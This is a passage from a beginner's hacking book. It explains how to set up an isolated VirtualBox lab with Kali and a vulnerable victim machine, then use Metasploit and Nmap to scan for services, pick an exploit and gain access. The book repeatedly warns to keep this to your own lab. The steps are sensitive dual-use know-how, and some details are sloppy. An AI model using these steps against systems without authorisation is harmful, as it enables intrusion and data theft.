accessible as easy to other people who may be scanning your network, leaving you in complete control. In order to create a virtual machine, we will be using VirtualBox, a software that allows
you to establish a hacking lab in order to test your skills on a simulated machine. VirtualBox is another open source software that allows you to have access to the source code free of charge,
allowing you to customise your build to your specifications.
Before continuing with your experiment ensure that the techniques and tools you use throughout this test are confined only to your machine and never used on other computers as this is not only
illegal, it is also potentially dangerous. Even if you are simply learning how to carry out an attack for the purpose of your own education, if you are caught you can be prosecuted, and as you
should have a good understanding from reading this book, this can be quite a serious crime and yes, it is possible to be caught. Keeping this in mind, let us go through with our virtual pen-test.
Initial Preparation
The first step toward setting up your environment is creating virtual machine to run on VirtualBox. You will need two machines, a target and a victim. You are able to download these online,
they will come with files that we can extract as well as vulnerabilities to exploit. Once you have the files in place, extract them and create a new machine on VirtualBox and choose the type of
machine you will be using. From there you decide how much RAM your machine will be running with, this isn’t too important so selecting a small amount won’t affect your test, 512MB is a
good starting point.
Your next task is then to select a hard disk by checking the Use an Existing Disk option. You are able to click on the folder option and select the appropriate file that you had extracted from your
download files and once that is all done, click create and your virtual machine and you are ready to move onto the next step.
Creating a Network
In order to access your machine, you will need to establish a virtual network. This is to keep your machine safe from existing threats outside your control. You are able to do this through
VirtualBox by going through File > Preferences > Network > Host Only Network. Once you click the plus sign, you are able to add a new entry which will be your virtual network. Now is time
to add your virtual machine to the virtual network. You are able to do this by selecting your virtual machine and clicking settings from the menu. From there you will see the network tab which
will allow you to click ‘Attacked to’ from and Host-Only Adaptor from the drop-down menu.
Attacking Tools
Now that your network and machine have been set up it is time to acquire the tools to launch your attack. In this example, we will be using Kali as it is simple to set up and you can also run it live
in a virtual machine. Once you have downloaded Kali as an ISO file, open VirtualBox and click Add to allow you to create another machine which will be your attacker. For your attacker, you
want to allocate some more memory to the machine of around 2GB, if your machine has less than 4GB on the system, you may need to allocate less. You will not need to allocate any hard drive
space, Kali is running live so check the box Do Not Add a Virtual Hard Drive. Once you are ready, hit create and your offending machine will be created. Ensure that you attach the machine to
your network and change the adapter to host-holy. From here, you will start both machines and run Kali on your attack machine when prompted to add a bootable CD. You are then presented
with the interface, and are ready to start scanning and gathering information from the Kali desktop interface.
Gathering Information
The next step in carrying out your attack is deciding upon your target. For the purpose of this experiment, we will be carrying out the attack on our victim server. In reality, this is a simple surface
attack rather than focusing on the entire network that we had set up or the virtualization tools. From there it is time to gather information to discover the vulnerabilities that we will be exploiting.
In order to do this, we will need to set this up in the software. This is where Metasploit will come into play as our framework for carrying out the pen-test, taking us through the process.
To do this, we must first we must initiate the services through Kali by entering:
“service postgresql start”
“service metasploit start”
Metasploit is best used through the console interface known as MSFConsole which is opened with
“Msfconsole”
Now you are ready to start your scan.
Scanning for Ports
In order to gather information on ports, you can use Nmap which is built into MSFconsole. In order to set this up, you will first need to enter the IP address of the target which you can find by
typing in
“ifconfig”
This will then bring up information on the IP address, labelled inet addr within the eth0 block. The IP address should be similar to other machines found on your network. By running a scan of
the IP address by using
Db_map -sS -A *TARGET IP ADDRESS*
You are able to have detailed list of all services running on the machine. From there you are able gather further information on each of the services to discover any vulnerabilities to exploit. Once
you have found the weakest point, you are able to move into attack mode.
Exploitation
By enter services into MSFconsole, you are able to access the database of information on the services running on the machine. Once you have discovered a service that is particularly vulnerable,
you are able to scan this service to assess points of weakness. This is done by typing
Search *service name*
You will be provided a list of exploits which you can take advantage and can then tell MSFconsole to exploit the model. Once you have set the target, you simply need to type the command “run”
for the program to work its magic and access the port. You will then be able to see what you are able to do once operating from the computer with a number of commands at your disposal with
the permissions provided to you by the service. From here you are able to extract data as well as upload data depending on your objective.
Once you have accessed the machine, you will obviously want to ensure that you remained in control and fortunately Metasploit has a number of tools to assist.
Conclusion
With this, we have now come to the end of this book. In the world of computer networking, security is given very high importance so as to protect data and safeguard the system from intruders.
In spite of strict security guidelines and authentication schemes, hackers have managed to break into several systems skillfully, piquing the interest of common folk.
Some hackers were able to develop groundbreaking utilities and websites like Facebook and Netflix (the founders of these websites are self-proclaimed hackers), so it is not surprising to see so
many young people wanting to learn hacking. Before venturing into the depths of hacking, one needs to have clear-cut ideas about the basics of hacking. That is exactly what this book is intended
for.
I have explained all the concepts of hacking in a lucid and comprehensive manner; however, putting them all into practice may seem tough initially. But do not get discouraged. Hacking is all
about practice, besides good problem solving skills. Make use of websites like “Hack this site,” which allow hackers to test their hacking skills legally. Also, do not think twice before seeking the
help of a professional security specialist if you feel all of this is too technical for you.
By now, you will have a good idea of what hacking is and the consequences that occur if an external or internal party attacks your system.
And please note that the world of computers is always changing and advancing. The more advanced the system, the more you need to improve your knowledge .